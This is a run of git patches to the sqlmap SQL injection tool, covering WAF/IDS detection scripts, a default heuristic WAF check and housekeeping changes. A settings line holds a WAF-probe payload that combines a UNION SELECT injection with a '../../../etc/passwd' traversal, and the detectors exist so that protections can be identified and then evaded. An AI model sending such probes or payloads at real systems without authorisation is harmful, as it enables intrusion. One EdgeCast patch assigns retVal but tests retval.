     if key in issues:

From f042a7392d16bd501c1b9e72521368280ac2164f Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 31 Dec 2014 17:10:45 +0100
Subject: [PATCH 266/492] Patch for an Issue #1083

---
 lib/parse/cmdline.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py
index 826314c70..3b33f8160 100644
--- a/lib/parse/cmdline.py
+++ b/lib/parse/cmdline.py
@@ -43,7 +43,7 @@ def cmdLineParser():
 
     checkSystemEncoding()
 
-    _ = getUnicode(os.path.normpath(sys.argv[0]), encoding=sys.getfilesystemencoding())
+    _ = getUnicode(os.path.basename(sys.argv[0]), encoding=sys.getfilesystemencoding())
 
     usage = "%s%s [options]" % ("python " if not IS_WIN else "", \
             "\"%s\"" % _ if " " in _ else _)

From beffe85d6ceec5ded8f186ba38476f8fc5629b7c Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Sat, 3 Jan 2015 22:30:21 +0100
Subject: [PATCH 267/492] Patch for an Issue #1085

---
 lib/controller/controller.py | 5 ++++-
 1 file changed, 4 insertions(+), 1 deletion(-)

diff --git a/lib/controller/controller.py b/lib/controller/controller.py
index 3979f1d8e..6795b76f4 100644
--- a/lib/controller/controller.py
+++ b/lib/controller/controller.py
@@ -28,6 +28,7 @@ from lib.core.common import getUnicode
 from lib.core.common import hashDBRetrieve
 from lib.core.common import hashDBWrite
 from lib.core.common import intersect
+from lib.core.common import isListLike
 from lib.core.common import parseTargetUrl
 from lib.core.common import randomStr
 from lib.core.common import readInput
@@ -189,7 +190,9 @@ def _randomFillBlankFields(value):
     return retVal
 
 def _saveToHashDB():
-    injections = hashDBRetrieve(HASHDB_KEYS.KB_INJECTIONS, True) or []
+    injections = hashDBRetrieve(HASHDB_KEYS.KB_INJECTIONS, True)
+    if not isListLike(injections):
+        injections = []
     injections.extend(_ for _ in kb.injections if _ and _.place is not None and _.parameter is not None)
 
     _ = dict()

From 7b144f03ea8f9769441e82e8fd05a7df40a14205 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Mon, 5 Jan 2015 01:31:06 +0100
Subject: [PATCH 268/492] Fix for an Issue #1092

---
 lib/techniques/blind/inference.py | 1 +
 1 file changed, 1 insertion(+)

diff --git a/lib/techniques/blind/inference.py b/lib/techniques/blind/inference.py
index 406b00672..4024abaab 100644
--- a/lib/techniques/blind/inference.py
+++ b/lib/techniques/blind/inference.py
@@ -59,6 +59,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
     """
 
     abortedFlag = False
+    showEta = False
     partialValue = u""
     finalValue = None
     retrievedLength = 0

From c474c16b4aa9fd9bfc7b034b4bba4acef9fb2059 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 6 Jan 2015 12:30:49 +0100
Subject: [PATCH 269/492] Removing ML email address

---
 lib/core/common.py   | 3 +--
 lib/core/settings.py | 1 -
 lib/request/basic.py | 3 +--
 lib/utils/hash.py    | 5 ++---
 4 files changed, 4 insertions(+), 8 deletions(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index b90c81872..0f96d92e3 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -117,7 +117,6 @@ from lib.core.settings import LARGE_OUTPUT_THRESHOLD
 from lib.core.settings import MIN_ENCODED_LEN_CHECK
 from lib.core.settings import MIN_TIME_RESPONSES
 from lib.core.settings import MIN_VALID_DELAYED_RESPONSE
-from lib.core.settings import ML
 from lib.core.settings import NETSCAPE_FORMAT_HEADER_COOKIES
 from lib.core.settings import NULL
 from lib.core.settings import PARAMETER_AMP_MARKER
@@ -2898,7 +2897,7 @@ def unhandledExceptionMessage():
     errMsg = "unhandled exception occurred in %s. It is recommended to retry your " % VERSION_STRING
     errMsg += "run with the latest development version from official GitHub "
     errMsg += "repository at '%s'. If the exception persists, please open a new issue " % GIT_PAGE
-    errMsg += "at '%s' (or less preferably send by e-mail to '%s') " % (ISSUES_PAGE, ML)
+    errMsg += "at '%s' " % ISSUES_PAGE
     errMsg += "with the following text and any other information required to "
     errMsg += "reproduce the bug. The "
     errMsg += "developers will try to reproduce the bug, fix it accordingly "
diff --git a/lib/core/settings.py b/lib/core/settings.py
index 311744bf4..6cdae1b66 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -27,7 +27,6 @@ SITE = "http://sqlmap.org"
 ISSUES_PAGE = "https://github.com/sqlmapproject/sqlmap/issues/new"
 GIT_REPOSITORY = "git://github.com/sqlmapproject/sqlmap.git"
 GIT_PAGE = "https://github.com/sqlmapproject/sqlmap"
-ML = "sqlmap-users@lists.sourceforge.net"
 
 # colorful banner
 BANNER = """\033[01;33m         _
diff --git a/lib/request/basic.py b/lib/request/basic.py
index d89ab5b29..b32a8c94c 100755
--- a/lib/request/basic.py
+++ b/lib/request/basic.py
@@ -31,7 +31,6 @@ from lib.core.settings import BLOCKED_IP_REGEX
 from lib.core.settings import DEFAULT_COOKIE_DELIMITER
 from lib.core.settings import EVENTVALIDATION_REGEX
 from lib.core.settings import MAX_CONNECTION_TOTAL_SIZE
-from lib.core.settings import ML
 from lib.core.settings import META_CHARSET_REGEX
 from lib.core.settings import PARSE_HEADERS_LIMIT
 from lib.core.settings import VIEWSTATE_REGEX
@@ -196,7 +195,7 @@ def checkCharEncoding(encoding, warn=True):
     except LookupError:
         if warn:
             warnMsg = "unknown web page charset '%s'. " % encoding
-            warnMsg += "Please report by e-mail to %s." % ML
+            warnMsg += "Please report by e-mail to 'dev@sqlmap.org'"
             singleTimeLogMessage(warnMsg, logging.WARN, encoding)
         encoding = None
 
diff --git a/lib/utils/hash.py b/lib/utils/hash.py
index ee3326ec9..5a29a0556 100644
--- a/lib/utils/hash.py
+++ b/lib/utils/hash.py
@@ -68,7 +68,6 @@ from lib.core.settings import HASH_MOD_ITEM_DISPLAY
 from lib.core.settings import HASH_RECOGNITION_QUIT_THRESHOLD
 from lib.core.settings import IS_WIN
 from lib.core.settings import ITOA64
-from lib.core.settings import ML
 from lib.core.settings import NULL
 from lib.core.settings import UNICODE_ENCODING
 from lib.core.settings import ROTATING_CHARS
@@ -578,7 +577,7 @@ def _bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, proc_id, proc
 
             except Exception, e:
                 warnMsg = "there was a problem while hashing entry: %s (%s). " % (repr(word), e)
-                warnMsg += "Please report by e-mail to %s" % ML
+                warnMsg += "Please report by e-mail to 'dev@sqlmap.org'"
                 logger.critical(warnMsg)
 
     except KeyboardInterrupt:
@@ -652,7 +651,7 @@ def _bruteProcessVariantB(user, hash_, kwargs, hash_regex, suffix, retVal, found
 
             except Exception, e:
                 warnMsg = "there was a problem while hashing entry: %s (%s). " % (repr(word), e)
-                warnMsg += "Please report by e-mail to %s" % ML
+                warnMsg += "Please report by e-mail to 'dev@sqlmap.org'"
                 logger.critical(warnMsg)
 
     except KeyboardInterrupt:

From cd7d9edcbe423da6b6a21d5df6aabb2525071819 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 6 Jan 2015 13:21:52 +0100
Subject: [PATCH 270/492] New waf file

---
 waf/blockdos.py | 24 ++++++++++++++++++++++++
 1 file changed, 24 insertions(+)
 create mode 100644 waf/blockdos.py

diff --git a/waf/blockdos.py b/waf/blockdos.py
new file mode 100644
index 000000000..0841c654c
--- /dev/null
+++ b/waf/blockdos.py
@@ -0,0 +1,24 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+import re
+
+from lib.core.enums import HTTP_HEADER
+from lib.core.settings import WAF_ATTACK_VECTORS
+
+__product__ = "BlockDoS"
+
+def detect(get_page):
+    retval = False
+
+    for vector in WAF_ATTACK_VECTORS:
+        page, headers, code = get_page(get=vector)
+        retval = re.search(r"BlockDos\.net", headers.get(HTTP_HEADER.SERVER, ""), re.I) is not None
+        if retval:
+            break
+
+    return retval

From 6fc41ca940738634bac477bae58c5b73f6b305a5 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 6 Jan 2015 14:01:47 +0100
Subject: [PATCH 271/492] Heuristically checking for WAF/IDS/IPS by default

---
 lib/controller/checks.py     | 42 +++++++++---------------------------
 lib/controller/controller.py |  3 +--
 lib/core/optiondict.py       |  1 -
 lib/core/settings.py         |  3 +++
 lib/parse/cmdline.py         |  4 ----
 sqlmap.conf                  |  4 ----
 6 files changed, 14 insertions(+), 43 deletions(-)

diff --git a/lib/controller/checks.py b/lib/controller/checks.py
index f2afacd4a..a2984e00d 100644
--- a/lib/controller/checks.py
+++ b/lib/controller/checks.py
@@ -59,6 +59,7 @@ from lib.core.exception import SqlmapConnectionException
 from lib.core.exception import SqlmapNoneDataException
 from lib.core.exception import SqlmapSilentQuitException
 from lib.core.exception import SqlmapUserQuitException
+from lib.core.settings import DEFAULT_GET_POST_DELIMITER
 from lib.core.settings import DUMMY_XSS_CHECK_APPENDIX
 from lib.core.settings import FORMAT_EXCEPTION_STRINGS
 from lib.core.settings import HEURISTIC_CHECK_ALPHABET
@@ -68,6 +69,7 @@ from lib.core.settings import URI_HTTP_HEADER
 from lib.core.settings import LOWER_RATIO_BOUND
 from lib.core.settings import UPPER_RATIO_BOUND
 from lib.core.settings import IDS_WAF_CHECK_PAYLOAD
+from lib.core.settings import IDS_WAF_CHECK_RATIO
 from lib.core.threads import getCurrentThreadData
 from lib.request.connect import Connect as Request
 from lib.request.inject import checkBooleanExpression
@@ -1094,56 +1096,32 @@ def checkWaf():
     Reference: http://seclists.org/nmap-dev/2011/q2/att-1005/http-waf-detect.nse
     """
 
-    if not conf.checkWaf:
-        return False
-
     infoMsg = "heuristically checking if the target is protected by "
     infoMsg += "some kind of WAF/IPS/IDS"
     logger.info(infoMsg)
 
     retVal = False
-
     backup = dict(conf.parameters)
-
     payload = "%d %s" % (randomInt(), IDS_WAF_CHECK_PAYLOAD)
 
     conf.parameters = dict(backup)
-    conf.parameters[PLACE.GET] = "" if not conf.parameters.get(PLACE.GET) else conf.parameters[PLACE.GET] + "&"
+    conf.parameters[PLACE.GET] = "" if not conf.parameters.get(PLACE.GET) else conf.parameters[PLACE.GET] + DEFAULT_GET_POST_DELIMITER
     conf.parameters[PLACE.GET] += "%s=%s" % (randomStr(), payload)
 
     logger.log(CUSTOM_LOGGING.PAYLOAD, payload)
 
-    kb.matchRatio = None
-    Request.queryPage()
-
-    if kb.errorIsNone and kb.matchRatio is None:
-        kb.matchRatio = LOWER_RATIO_BOUND
-
-    conf.parameters = dict(backup)
-    conf.parameters[PLACE.GET] = "" if not conf.parameters.get(PLACE.GET) else conf.parameters[PLACE.GET] + "&"
-    conf.parameters[PLACE.GET] += "%s=%d" % (randomStr(), randomInt())
-
-    trueResult = Request.queryPage()
-
-    if trueResult:
+    try:
+        retVal = Request.queryPage(getRatioValue=True, noteResponseTime=False, silent=True)[1] < IDS_WAF_CHECK_RATIO
+    except SqlmapConnectionException:
+        retVal = True
+    finally:
+        kb.matchRatio = None
         conf.parameters = dict(backup)
-        conf.parameters[PLACE.GET] = "" if not conf.parameters.get(PLACE.GET) else conf.parameters[PLACE.GET] + "&"
-        conf.parameters[PLACE.GET] += "%s=%d %s" % (randomStr(), randomInt(), IDS_WAF_CHECK_PAYLOAD)
-
-        try:
-            falseResult = Request.queryPage()
-        except SqlmapConnectionException:
-            falseResult = None
-
-        if not falseResult:
-            retVal = True
-
-    conf.parameters = dict(backup)
 
     if retVal:
         warnMsg = "it appears that the target is protected. Please "
         warnMsg += "consider usage of tamper scripts (option '--tamper')"
-        logger.warn(warnMsg)
+        logger.critical(warnMsg)
     else:
         infoMsg = "it appears that the target is not protected"
         logger.info(infoMsg)
diff --git a/lib/controller/controller.py b/lib/controller/controller.py
index 6795b76f4..3951ba168 100644
--- a/lib/controller/controller.py
+++ b/lib/controller/controller.py
@@ -372,8 +372,7 @@ def start():
             if not checkConnection(suppressOutput=conf.forms) or not checkString() or not checkRegexp():
                 continue
 
-            if conf.checkWaf:
-                checkWaf()
+            checkWaf()
 
             if conf.identifyWaf:
                 identifyWaf()
diff --git a/lib/core/optiondict.py b/lib/core/optiondict.py
index d637aa817..3c09adeda 100644
--- a/lib/core/optiondict.py
+++ b/lib/core/optiondict.py
@@ -209,7 +209,6 @@ optDict = {
                                "alert":             "string",
                                "answers":           "string",
                                "beep":              "boolean",
-                               "checkWaf":          "boolean",
                                "cleanup":           "boolean",
                                "dependencies":      "boolean",
                                "disableColoring":   "boolean",
diff --git a/lib/core/settings.py b/lib/core/settings.py
index 6cdae1b66..0dbc41c5d 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -40,6 +40,9 @@ BANNER = """\033[01;33m         _
 DIFF_TOLERANCE = 0.05
 CONSTANT_RATIO = 0.9
 
+# Ratio used in heuristic check for WAF/IDS/IPS protected targets
+IDS_WAF_CHECK_RATIO = 0.5
+
 # Lower and upper values for match ratio in case of stable page
 LOWER_RATIO_BOUND = 0.02
 UPPER_RATIO_BOUND = 0.98
diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py
index 3b33f8160..ef3112aec 100644
--- a/lib/parse/cmdline.py
+++ b/lib/parse/cmdline.py
@@ -676,10 +676,6 @@ def cmdLineParser():
         miscellaneous.add_option("--beep", dest="beep", action="store_true",
                                   help="Make a beep sound when SQL injection is found")
 
-        miscellaneous.add_option("--check-waf", dest="checkWaf",
-                                  action="store_true",
-                                  help="Heuristically check for WAF/IPS/IDS protection")
-
         miscellaneous.add_option("--cleanup", dest="cleanup",
                                   action="store_true",
                                   help="Clean up the DBMS from sqlmap specific "
diff --git a/sqlmap.conf b/sqlmap.conf
index 6a2fad0b8..cc506987d 100644
--- a/sqlmap.conf
+++ b/sqlmap.conf
@@ -718,10 +718,6 @@ beep = False
 # Valid: True or False
 checkPayload = False
 
-# Heuristically check for WAF/IPS/IDS protection.
-# Valid: True or False
-checkWaf = False
-
 # Clean up the DBMS from sqlmap specific UDF and tables.
 # Valid: True or False
 cleanup = False

From abd429d48bb9b883153c5a474e77dd987d4ee5f5 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 6 Jan 2015 14:11:53 +0100
Subject: [PATCH 272/492] New waf script added

---
 waf/senginx.py | 24 ++++++++++++++++++++++++
 1 file changed, 24 insertions(+)
 create mode 100644 waf/senginx.py

diff --git a/waf/senginx.py b/waf/senginx.py
new file mode 100644
index 000000000..0c154917a
--- /dev/null
+++ b/waf/senginx.py
@@ -0,0 +1,24 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+import re
+
+from lib.core.enums import HTTP_HEADER
+from lib.core.settings import WAF_ATTACK_VECTORS
+
+__product__ = "SEnginx (Neusoft Corporation)"
+
+def detect(get_page):
+    retval = False
+
+    for vector in WAF_ATTACK_VECTORS:
+        page, headers, code = get_page(get=vector)
+        retval = "SENGINX-ROBOT-MITIGATION" in page
+        if retval:
+            break
+
+    return retval

From 3d5ca1b25a6c68d609f150dee9306a859436d73d Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 6 Jan 2015 14:36:51 +0100
Subject: [PATCH 273/492] Minor update

---
 lib/core/settings.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/core/settings.py b/lib/core/settings.py
index 0dbc41c5d..59522a204 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -429,7 +429,7 @@ BRUTE_TABLE_EXISTS_TEMPLATE = "EXISTS(SELECT %d FROM %s)"
 BRUTE_COLUMN_EXISTS_TEMPLATE = "EXISTS(SELECT %s FROM %s)"
 
 # Payload used for checking of existence of IDS/WAF (dummier the better)
-IDS_WAF_CHECK_PAYLOAD = "AND 1=1 UNION ALL SELECT 1,2,3,table_name FROM information_schema.tables WHERE 2>1"
+IDS_WAF_CHECK_PAYLOAD = "AND 1=1 UNION ALL SELECT 1,2,3,table_name FROM information_schema.tables WHERE 2>1-- ../../../etc/passwd"
 
 # Vectors used for provoking specific WAF/IDS/IPS behavior(s)
 WAF_ATTACK_VECTORS = (

From cef55302557228908fa7893a0aa3cdf5caa320d4 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 6 Jan 2015 14:41:19 +0100
Subject: [PATCH 274/492] Minor update

---
 waf/barracuda.py | 1 +
 1 file changed, 1 insertion(+)

diff --git a/waf/barracuda.py b/waf/barracuda.py
index ad81087db..265858136 100644
--- a/waf/barracuda.py
+++ b/waf/barracuda.py
@@ -18,6 +18,7 @@ def detect(get_page):
     for vector in WAF_ATTACK_VECTORS:
         page, headers, code = get_page(get=vector)
         retval = re.search(r"\Abarra_counter_session=", headers.get(HTTP_HEADER.SET_COOKIE, ""), re.I) is not None
+        retval |= re.search(r"(\A|\b)barracuda_", headers.get(HTTP_HEADER.SET_COOKIE, ""), re.I) is not None
         if retval:
             break
 

From 8e680fb2719e9a6c6a2f07f93513c83d92023e86 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 6 Jan 2015 14:49:50 +0100
Subject: [PATCH 275/492] Minor update

---
 waf/radware.py | 1 +
 1 file changed, 1 insertion(+)

diff --git a/waf/radware.py b/waf/radware.py
index 8cd65b125..3f1f356e7 100644
--- a/waf/radware.py
+++ b/waf/radware.py
@@ -17,6 +17,7 @@ def detect(get_page):
     for vector in WAF_ATTACK_VECTORS:
         page, headers, code = get_page(get=vector)
         retval = re.search(r"Unauthorized Activity Has Been Detected.+Case Number:", page, re.I | re.S) is not None
+        retval |= headers.get("X-SL-CompState") is not None
         if retval:
             break
 

From e41591c9c1d720b63e9827daf51d3a0cc47a7be4 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 6 Jan 2015 14:53:16 +0100
Subject: [PATCH 276/492] Adding new WAF script

---
 waf/edgecast.py | 24 ++++++++++++++++++++++++
 1 file changed, 24 insertions(+)
 create mode 100644 waf/edgecast.py

diff --git a/waf/edgecast.py b/waf/edgecast.py
new file mode 100644
index 000000000..1555a05da
--- /dev/null
+++ b/waf/edgecast.py
@@ -0,0 +1,24 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+import re
+
+from lib.core.enums import HTTP_HEADER
+from lib.core.settings import WAF_ATTACK_VECTORS
+
+__product__ = "EdgeCast WAF (Verizon)"
+
+def detect(get_page):
+    retval = False
+
+    for vector in WAF_ATTACK_VECTORS:
+        page, headers, code = get_page(get=vector)
+        retval = re.search(r"\AECS", headers.get(HTTP_HEADER.SERVER, ""), re.I) is not None
+        if retval:
+            break
+
+    return retval

From e976418d28eaebb5a38a4cc4269e2081dc2d0f71 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 6 Jan 2015 14:58:05 +0100
Subject: [PATCH 277/492] Minor patch

---
 waf/edgecast.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/waf/edgecast.py b/waf/edgecast.py
index 1555a05da..0f37f5f3e 100644
--- a/waf/edgecast.py
+++ b/waf/edgecast.py
@@ -17,7 +17,7 @@ def detect(get_page):
 
     for vector in WAF_ATTACK_VECTORS:
         page, headers, code = get_page(get=vector)
-        retval = re.search(r"\AECS", headers.get(HTTP_HEADER.SERVER, ""), re.I) is not None
+        retVal = code == 400 and re.search(r"\AECDF", headers.get(HTTP_HEADER.SERVER, ""), re.I) is not None
         if retval:
             break
 

From 45bdefd29bac46f5c7873c09d3663a571508ad7d Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 6 Jan 2015 15:02:16 +0100
Subject: [PATCH 278/492] Update of copyright

---
 doc/COPYING                             | 2 +-
 extra/__init__.py                       | 2 +-
 extra/beep/__init__.py                  | 2 +-
 extra/beep/beep.py                      | 2 +-
 extra/cloak/__init__.py                 | 2 +-
 extra/cloak/cloak.py                    | 2 +-
 extra/dbgtool/__init__.py               | 2 +-
 extra/dbgtool/dbgtool.py                | 2 +-
 extra/mssqlsig/update.py                | 2 +-
 extra/safe2bin/__init__.py              | 2 +-
 extra/safe2bin/safe2bin.py              | 2 +-
 extra/shutils/duplicates.py             | 2 +-
 extra/shutils/regressiontest.py         | 2 +-
 extra/sqlharvest/__init__.py            | 2 +-
 extra/sqlharvest/sqlharvest.py          | 2 +-
 lib/__init__.py                         | 2 +-
 lib/controller/__init__.py              | 2 +-
 lib/controller/action.py                | 2 +-
 lib/controller/checks.py                | 2 +-
 lib/controller/controller.py            | 2 +-
 lib/controller/handler.py               | 2 +-
 lib/core/__init__.py                    | 2 +-
 lib/core/agent.py                       | 2 +-
 lib/core/bigarray.py                    | 2 +-
 lib/core/common.py                      | 2 +-
 lib/core/convert.py                     | 2 +-
 lib/core/data.py                        | 2 +-
 lib/core/datatype.py                    | 2 +-
 lib/core/decorators.py                  | 2 +-
 lib/core/defaults.py                    | 2 +-
 lib/core/dicts.py                       | 2 +-
 lib/core/dump.py                        | 2 +-
 lib/core/enums.py                       | 2 +-
 lib/core/exception.py                   | 2 +-
 lib/core/log.py                         | 2 +-
 lib/core/option.py                      | 2 +-
 lib/core/optiondict.py                  | 2 +-
 lib/core/profiling.py                   | 2 +-
 lib/core/readlineng.py                  | 2 +-
 lib/core/replication.py                 | 2 +-
 lib/core/revision.py                    | 2 +-
 lib/core/session.py                     | 2 +-
 lib/core/settings.py                    | 2 +-
 lib/core/shell.py                       | 2 +-
 lib/core/subprocessng.py                | 2 +-
 lib/core/target.py                      | 2 +-
 lib/core/testing.py                     | 2 +-
 lib/core/threads.py                     | 2 +-
 lib/core/unescaper.py                   | 2 +-
 lib/core/update.py                      | 2 +-
 lib/core/wordlist.py                    | 2 +-
 lib/parse/__init__.py                   | 2 +-
 lib/parse/banner.py                     | 2 +-
 lib/parse/cmdline.py                    | 2 +-
 lib/parse/configfile.py                 | 2 +-
 lib/parse/handler.py                    | 2 +-
 lib/parse/headers.py                    | 2 +-
 lib/parse/html.py                       | 2 +-
 lib/parse/payloads.py                   | 2 +-
 lib/parse/sitemap.py                    | 2 +-
 lib/request/__init__.py                 | 2 +-
 lib/request/basic.py                    | 2 +-
 lib/request/basicauthhandler.py         | 2 +-
 lib/request/comparison.py               | 2 +-
 lib/request/connect.py                  | 2 +-
 lib/request/direct.py                   | 2 +-
 lib/request/dns.py                      | 2 +-
 lib/request/httpshandler.py             | 2 +-
 lib/request/inject.py                   | 2 +-
 lib/request/methodrequest.py            | 2 +-
 lib/request/pkihandler.py               | 2 +-
 lib/request/rangehandler.py             | 2 +-
 lib/request/redirecthandler.py          | 2 +-
 lib/request/templates.py                | 2 +-
 lib/takeover/__init__.py                | 2 +-
 lib/takeover/abstraction.py             | 2 +-
 lib/takeover/icmpsh.py                  | 2 +-
 lib/takeover/metasploit.py              | 2 +-
 lib/takeover/registry.py                | 2 +-
 lib/takeover/udf.py                     | 2 +-
 lib/takeover/web.py                     | 2 +-
 lib/takeover/xp_cmdshell.py             | 2 +-
 lib/techniques/__init__.py              | 2 +-
 lib/techniques/blind/__init__.py        | 2 +-
 lib/techniques/blind/inference.py       | 2 +-
 lib/techniques/brute/__init__.py        | 2 +-
 lib/techniques/brute/use.py             | 2 +-
 lib/techniques/dns/__init__.py          | 2 +-
 lib/techniques/dns/test.py              | 2 +-
 lib/techniques/dns/use.py               | 2 +-
 lib/techniques/error/__init__.py        | 2 +-
 lib/techniques/error/use.py             | 2 +-
 lib/techniques/union/__init__.py        | 2 +-
 lib/techniques/union/test.py            | 2 +-
 lib/techniques/union/use.py             | 2 +-
 lib/utils/__init__.py                   | 2 +-
 lib/utils/api.py                        | 2 +-
 lib/utils/crawler.py                    | 2 +-
 lib/utils/deps.py                       | 2 +-
 lib/utils/getch.py                      | 2 +-
 lib/utils/google.py                     | 2 +-
 lib/utils/hash.py                       | 2 +-
 lib/utils/hashdb.py                     | 2 +-
 lib/utils/htmlentities.py               | 2 +-
 lib/utils/pivotdumptable.py             | 2 +-
 lib/utils/progress.py                   | 2 +-
 lib/utils/purge.py                      | 2 +-
 lib/utils/sqlalchemy.py                 | 2 +-
 lib/utils/timeout.py                    | 2 +-
 lib/utils/versioncheck.py               | 2 +-
 lib/utils/xrange.py                     | 2 +-
 plugins/__init__.py                     | 2 +-
 plugins/dbms/__init__.py                | 2 +-
 plugins/dbms/access/__init__.py         | 2 +-
 plugins/dbms/access/connector.py        | 2 +-
 plugins/dbms/access/enumeration.py      | 2 +-
 plugins/dbms/access/filesystem.py       | 2 +-
 plugins/dbms/access/fingerprint.py      | 2 +-
 plugins/dbms/access/syntax.py           | 2 +-
 plugins/dbms/access/takeover.py         | 2 +-
 plugins/dbms/db2/__init__.py            | 2 +-
 plugins/dbms/db2/connector.py           | 2 +-
 plugins/dbms/db2/enumeration.py         | 2 +-
 plugins/dbms/db2/filesystem.py          | 2 +-
 plugins/dbms/db2/fingerprint.py         | 2 +-
 plugins/dbms/db2/syntax.py              | 2 +-
 plugins/dbms/db2/takeover.py            | 2 +-
 plugins/dbms/firebird/__init__.py       | 2 +-
 plugins/dbms/firebird/connector.py      | 2 +-
 plugins/dbms/firebird/enumeration.py    | 2 +-
 plugins/dbms/firebird/filesystem.py     | 2 +-
 plugins/dbms/firebird/fingerprint.py    | 2 +-
 plugins/dbms/firebird/syntax.py         | 2 +-
 plugins/dbms/firebird/takeover.py       | 2 +-
 plugins/dbms/hsqldb/__init__.py         | 2 +-
 plugins/dbms/hsqldb/connector.py        | 2 +-
 plugins/dbms/hsqldb/enumeration.py      | 2 +-
 plugins/dbms/hsqldb/filesystem.py       | 2 +-
 plugins/dbms/hsqldb/fingerprint.py      | 2 +-
 plugins/dbms/hsqldb/syntax.py           | 2 +-
 plugins/dbms/hsqldb/takeover.py         | 2 +-
 plugins/dbms/maxdb/__init__.py          | 2 +-
 plugins/dbms/maxdb/connector.py         | 2 +-
 plugins/dbms/maxdb/enumeration.py       | 2 +-
 plugins/dbms/maxdb/filesystem.py        | 2 +-
 plugins/dbms/maxdb/fingerprint.py       | 2 +-
 plugins/dbms/maxdb/syntax.py            | 2 +-
 plugins/dbms/maxdb/takeover.py          | 2 +-
 plugins/dbms/mssqlserver/__init__.py    | 2 +-
 plugins/dbms/mssqlserver/connector.py   | 2 +-
 plugins/dbms/mssqlserver/enumeration.py | 2 +-
 plugins/dbms/mssqlserver/filesystem.py  | 2 +-
 plugins/dbms/mssqlserver/fingerprint.py | 2 +-
 plugins/dbms/mssqlserver/syntax.py      | 2 +-
 plugins/dbms/mssqlserver/takeover.py    | 2 +-
 plugins/dbms/mysql/__init__.py          | 2 +-
 plugins/dbms/mysql/connector.py         | 2 +-
 plugins/dbms/mysql/enumeration.py       | 2 +-
 plugins/dbms/mysql/filesystem.py        | 2 +-
 plugins/dbms/mysql/fingerprint.py       | 2 +-
 plugins/dbms/mysql/syntax.py            | 2 +-
 plugins/dbms/mysql/takeover.py          | 2 +-
 plugins/dbms/oracle/__init__.py         | 2 +-
 plugins/dbms/oracle/connector.py        | 2 +-
 plugins/dbms/oracle/enumeration.py      | 2 +-
 plugins/dbms/oracle/filesystem.py       | 2 +-
 plugins/dbms/oracle/fingerprint.py      | 2 +-
 plugins/dbms/oracle/syntax.py           | 2 +-
 plugins/dbms/oracle/takeover.py         | 2 +-
 plugins/dbms/postgresql/__init__.py     | 2 +-
 plugins/dbms/postgresql/connector.py    | 2 +-
 plugins/dbms/postgresql/enumeration.py  | 2 +-
 plugins/dbms/postgresql/filesystem.py   | 2 +-
 plugins/dbms/postgresql/fingerprint.py  | 2 +-
 plugins/dbms/postgresql/syntax.py       | 2 +-
 plugins/dbms/postgresql/takeover.py     | 2 +-
 plugins/dbms/sqlite/__init__.py         | 2 +-
 plugins/dbms/sqlite/connector.py        | 2 +-
 plugins/dbms/sqlite/enumeration.py      | 2 +-
 plugins/dbms/sqlite/filesystem.py       | 2 +-
 plugins/dbms/sqlite/fingerprint.py      | 2 +-
 plugins/dbms/sqlite/syntax.py           | 2 +-
 plugins/dbms/sqlite/takeover.py         | 2 +-
 plugins/dbms/sybase/__init__.py         | 2 +-
 plugins/dbms/sybase/connector.py        | 2 +-
 plugins/dbms/sybase/enumeration.py      | 2 +-
 plugins/dbms/sybase/filesystem.py       | 2 +-
 plugins/dbms/sybase/fingerprint.py      | 2 +-
 plugins/dbms/sybase/syntax.py           | 2 +-
 plugins/dbms/sybase/takeover.py         | 2 +-
 plugins/generic/__init__.py             | 2 +-
 plugins/generic/connector.py            | 2 +-
 plugins/generic/custom.py               | 2 +-
 plugins/generic/databases.py            | 2 +-
 plugins/generic/entries.py              | 2 +-
 plugins/generic/enumeration.py          | 2 +-
 plugins/generic/filesystem.py           | 2 +-
 plugins/generic/fingerprint.py          | 2 +-
 plugins/generic/misc.py                 | 2 +-
 plugins/generic/search.py               | 2 +-
 plugins/generic/syntax.py               | 2 +-
 plugins/generic/takeover.py             | 2 +-
 plugins/generic/users.py                | 2 +-
 sqlmap.py                               | 2 +-
 sqlmapapi.py                            | 2 +-
 tamper/__init__.py                      | 2 +-
 tamper/apostrophemask.py                | 2 +-
